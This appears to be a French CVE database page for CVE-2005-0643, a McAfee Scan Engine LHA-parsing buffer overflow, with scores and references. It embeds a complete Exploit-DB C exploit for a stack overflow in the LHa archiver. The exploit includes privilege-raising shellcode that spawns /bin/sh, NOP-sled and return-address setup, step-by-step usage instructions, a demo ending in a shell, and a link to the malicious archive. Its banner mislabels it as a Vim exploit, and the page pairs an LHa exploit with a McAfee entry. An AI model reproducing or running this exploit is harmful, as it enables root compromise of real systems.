CVE-2005-0643 : Détail

CVE-2005-0643

5.39%V4
Network
2005-03-20
04h00 +00:00
2021-06-15
14h38 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in McAfee Scan Engine 4320 with DAT version before 4357 allows remote attackers to execute arbitrary code via crafted LHA files.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 24067

Date de publication : 2004-04-29 22h00 +00:00
Auteur : N4rK07IX
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/10243/info LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. **NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. **Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. /* Author : N4rK07IX narkotix@linuxmail.org Bug Found By : Ulf Ha"rnhammar <Ulf.Harnhammar.9485@student.uu.se> LHa buffer overflows and directory traversal problems PROGRAM: LHa (Unix version) VENDOR: various people VULNERABLE VERSIONS: 1.14d to 1.14i // Theze sectionz completely taken from full-disclosure :)) 1.17 (Linux binary) possibly others IMMUNE VERSIONS: 1.14i with my patch applied 1.14h with my patch applied Patch : Ulf Ha"rnhammar made some patch U can find it on : LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm http://www2m.biglobe.ne.jp/~dolphin/lha/prog/ LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/ --------------------------------------------------------------- Little Explanation about Exploit : Copy the attached overflow.lha file to your directory , i.e /home Then open overflow.lha with text editor(vim is better), U will see there four bytes XXXX at the end of the line, just delete XXXX and paste your ASCII RET address there,but make sure not to malform the file.Then run the sploit. Note : overflow.lha file is completely taken from Ulf's post. Demo: addicted@labs:~/c-hell$ ./lha /home/addicted/overflow.lha -------------------------------------------------- | Author : N4rK07IX | Vim 6.x Local Xpl0it | narkotix@linuxmail.org |-------------------------------------------------- [+] RET ADDRESS = 0xbffffd90 [!] Paste These ASCII 4 bytes Ret Adress to the XXXX in the file overflow.lha [!] ASCII RET ADDR = ���� [+] Exploiting the buffer.. LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUAAAAAAA����B sh-2.05b$ Gretingz: Efnet,mathmonkey,Uz4yh4N,laplace_ex,xmlguy,gotcha,forkbomb */ #include <stdio.h> #include <string.h> #include <unistd.h> #define BUFFERSIZE 2000 #define FEED 600 #define PATH "/usr/bin/lha" #define PROG "lha" static char shellcode[] = //* setreuid(0,0); "\x31\xc0" // xor %eax,%eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx "\xb0\x46" // mov $0x46,%al "\xcd\x80" // int $0x80 /* setgid(0); */ "\x31\xdb" // xor %ebx,%ebx "\x89\xd8" // mov %ebx,%eax "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80 // execve /bin/sh "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx "\x50" // push %eax "\x53" // push %ebx "\x8d\x0c\x24" // lea (%esp,1),%ecx "\xb0\x0b" // mov $0xb,%al "\xcd\x80" // int $0x80 // exit(); "\x31\xc0" // xor %eax,%eax "\xb0\x01" // mov $0x1,%al "\xcd\x80"; // int $0x80 int main(int argc, char *argv[]) { if( argc < 2 ) { printf("[-] Enter The Full Of the overflow.lha \n"); exit(-1); } printf("--------------------------------------------------\n"); printf("| Author : N4rK07IX\n"); printf("| Found by : Ulf Ha'rnhammar\n"); printf("| LHa 1.14d 1.14i 1.17 Local Lame Stack Overflow Sploit\n"); printf("| narkotix@linuxmail.org\n"); printf("|--------------------------------------------------\n"); char buffer[BUFFERSIZE]; char addict[FEED]; int i, *adr_pointer, *addict_pointer; memset(addict,0x90,sizeof(addict)); memcpy(&addict[FEED-strlen(shellcode)],shellcode,strlen(shellcode)); memcpy(addict,"ADDICT=",7); putenv(addict); unsigned long ret = 0XBFFFFFFA -strlen("/usr/bin/lha") - strlen(addict); printf("[+] RET ADDRESS = 0x%x\n",ret); char l = (ret & 0x000000ff); char a = (ret & 0x0000ff00) >> 8; char m = (ret & 0x00ff0000) >> 16; char e = (ret & 0xff000000) >> 24; printf("[!] Paste These ASCII 4 bytes Ret Adress to the XXXX in the file overflow.lha\n"); printf("[!] ASCII RET ADDR = %c%c%c%c\n",l,a,m,e); printf("[+] Exploiting the buffer..\n"); adr_pointer = (int *)(buffer); for(i = 0 ; i < BUFFERSIZE ; i += 4) *adr_pointer++ = ret; execl(PATH,PROG,"x",argv[1],NULL); if(!execl); perror("execl()"); printf("[+] Done B4by\n"); return 0; } https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24067.lha

Products Mentioned

Configuraton 0

Mcafee>>Antivirus_engine >> Version 4.3.20

Références

http://www.securityfocus.com/bid/10243
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/14628
Tags : third-party-advisory, x_refsource_SECUNIA
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC) sont maintenues par MITRE Corporation, et les informations sur les configurations logicielles et matérielles (CPE) proviennent du NVD.